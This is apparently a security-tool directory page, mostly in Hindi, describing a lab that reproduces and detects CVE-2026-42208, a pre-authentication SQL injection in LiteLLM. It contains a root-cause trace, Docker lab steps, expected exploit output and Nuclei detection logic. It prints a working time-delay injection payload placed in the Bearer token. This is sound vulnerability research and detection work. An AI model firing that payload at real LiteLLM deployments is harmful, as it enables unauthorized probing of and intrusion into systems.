Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
poc_cve-2026-42208 | Kitploit
उपकरण/GitHubGitHub/haerin-l/poc_cve-2026-42208
भेद्यता विश्लेषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubhaerin-l/poc_cve-2026-42208

poc_cve-2026-42208

रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-42208 — LiteLLM प्री-ऑथेंटिकेशन SQL इंजेक्शन

CVE-2026-42208 को पुन: उत्पन्न करने और पहचानने के लिए एक लैब वातावरण, जो LiteLLM में एक गंभीर प्री-ऑथेंटिकेशन SQL इंजेक्शन भेद्यता है, जहाँ बिना सैनिटाइज़ किए गए Bearer टोकन एक कच्चे PostgreSQL क्वेरी तक पहुँचते हैं।


भेद्यता अवलोकन

फ़ील्डविवरण
CVE IDCVE-2026-42208
GHSAGHSA-r75f-5x8p-qvmc
CVSS9.3 (गंभीर) — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
प्रभावित संस्करण>= 1.81.16, < 1.83.7
पैच किया गयाv1.83.7 (पैरामीटराइज़्ड क्वेरी)
CWECWE-89 (SQL इंजेक्शन)

मूल कारण

root@kitploit:~
Vulnerable (v1.83.6):
  POST /v1/chat/completions
  Authorization: Bearer <payload>   ← payload does NOT start with "sk-"
    → api_key.startswith("sk-") assertion fails  (utils.py:1189)
    → caught by except Exception                  (utils.py:1560)
    → _handle_authentication_error(api_key=RAW_PAYLOAD)
    → _enrich_failure_metadata_with_key_info()
    → get_data(token=RAW_PAYLOAD, table_name="combined_view")
    → SQL: WHERE v.token = '{payload}'  ← injection

Patched (v1.83.7):
  Same request path, but:
    → get_data(token=hashed_token, ...)
    → SQL: WHERE v.token = $1          ← parameterized, no injection

हमले की पूर्वापेक्षाएँ


लैब आर्किटेक्चर

root@kitploit:~
Host Machine
├── localhost:8010 ──→ Docker: litellm-vuln    (v1.83.6-nightly  ⚠ VULNERABLE)
│                      Docker: litellm-db-vuln  (PostgreSQL 15)
└── localhost:8011 ──→ Docker: litellm-patched (v1.83.7-stable   ✓ PATCHED)
                       Docker: litellm-db-patched (PostgreSQL 15)

पूर्वापेक्षाएँ

टूलइंस्टॉल
Docker Desktopdocker.com
nucleibrew install nuclei
curl, python3macOS पर पहले से इंस्टॉल

चलाने का तरीका

चरण 1 — लैब वातावरण सेट करें

root@kitploit:~
bash scripts/01-setup.sh

पूर्ण होने पर:

root@kitploit:~
══════════════════════════════════════════════════════
 Lab ready!
 Vulnerable (v1.83.6-nightly) : http://localhost:8010
 Patched    (v1.83.7-stable)  : http://localhost:8011
 Master Key : sk-lab-master-key
 Next: bash scripts/02-exploit.sh
══════════════════════════════════════════════════════

चरण 2 — CVE ट्रिगर करें

root@kitploit:~
bash scripts/02-exploit.sh

अपेक्षित आउटपुट — भेद्य (v1.83.6-nightly):

root@kitploit:~
── Vulnerable (v1.83.6-nightly, port 8010) ──
  Baseline    : 0.031s
  Injection   : 6.062s  (HTTP 401)
  Delta       : +6.031s
  ⚠  RESULT: pg_sleep fired — SQL INJECTION CONFIRMED (VULNERABLE)

अपेक्षित आउटपुट — पैच किया गया (v1.83.7-stable):

root@kitploit:~
── Patched    (v1.83.7-stable,  port 8011) ──
  Baseline    : 0.028s
  Injection   : 0.029s  (HTTP 401)
  Delta       : +0.001s
  ✓  RESULT: No significant delay — injection not executed (PATCHED)

चरण 3 — Nuclei पहचान

root@kitploit:~
# Vulnerable instance → should produce a [critical] finding
nuclei -t nuclei/CVE-2026-42208.yaml -u http://localhost:8010

# Patched instance → should produce no findings
nuclei -t nuclei/CVE-2026-42208.yaml -u http://localhost:8011

भेद्य (v1.83.6-nightly):

Nuclei पहचान — भेद्य

पैच किया गया (v1.83.7-stable):

Nuclei पहचान — पैच किया गया

चरण 4 — टियरडाउन

root@kitploit:~
bash scripts/99-teardown.sh

डायरेक्टरी संरचना

root@kitploit:~
litellm-cve-2026-42208/
├── README.md
├── VULNERABILITY_ANALYSIS.md       # Code-level analysis (English)
├── LAB_SETUP_GUIDE.md              # Lab setup guide (English)
├── NUCLEI_TEMPLATE_GUIDE.md        # Nuclei template design (English)
├── docker-compose.yaml
│
├── REPORT/                         # Korean reports
│   ├── Vulnerability_Analysis_KR.md
│   ├── LAB_REPORT_KR.md
│   └── Nuclei_Template_Report_KR.md
│
├── nuclei/
│   └── CVE-2026-42208.yaml         # Nuclei detection template
│
└── scripts/
    ├── 01-setup.sh                 # Start containers, create seed key
    ├── 02-exploit.sh               # PoC: timing-based injection proof
    └── 99-teardown.sh              # Stop and remove all lab resources

Nuclei टेम्पलेट पहचान लॉजिक

root@kitploit:~
Step 1  GET /health/liveliness
        → match "I am alive" in body
        → confirms target is a LiteLLM instance

Step 2  POST /v1/chat/completions
        Authorization: Bearer ' OR (SELECT pg_sleep(6)) IS NOT NULL --

        Matchers (AND — all must pass):
          status == 401           eliminates 504/502 false positives
          body contains           "auth_error" OR "Authentication Error"
                                  confirms LiteLLM auth path, not a proxy
          duration >= 5           pg_sleep(6) fired → injection confirmed

फ़ॉल्स पॉज़िटिव रोकथाम:

  • status == 401 अपस्ट्रीम टाइमआउट (504) और गेटवे त्रुटियों (502) से उत्पन्न प्रतिसादों को समाप्त करता है
  • बॉडी कीवर्ड मिलान पुष्टि करता है कि 401 LiteLLM की प्रमाणीकरण हैंडलिंग से आया है, न कि किसी WAF या प्रॉक्सी से
  • duration >= 5 नेटवर्क जिटर को बाहर करने के लिए पर्याप्त रूप से उच्च है (बेसलाइन ≤0.5s है)

संदर्भ

  • GHSA-r75f-5x8p-qvmc
  • NVD — CVE-2026-42208
  • Sysdig Analysis

चेतावनी: इस लैब के सभी क्रेडेंशियल केवल सुरक्षा अनुसंधान उद्देश्यों के लिए नकली परीक्षण डेटा हैं। इन्हें प्रोडक्शन में कभी उपयोग न करें। जिन सिस्टम्स के स्वामी आप नहीं हैं, उन्हें स्कैन करने से पहले हमेशा स्पष्ट प्राधिकरण प्राप्त करें।

टूल डाउनलोड करें
#शर्तविवरण
1प्रभावित LiteLLM संस्करण>= 1.81.16, < 1.83.7
2PostgreSQL बैकएंडSQLite डिप्लॉयमेंट प्रभावित नहीं होते
3कोई प्रमाणीकरण आवश्यक नहींप्री-ऑथ; शून्य क्रेडेंशियल चाहिए
4VerificationToken में ≥1 पंक्तिpg_sleep केवल प्रति पंक्ति चलता है; खाली तालिका = कोई विलंब नहीं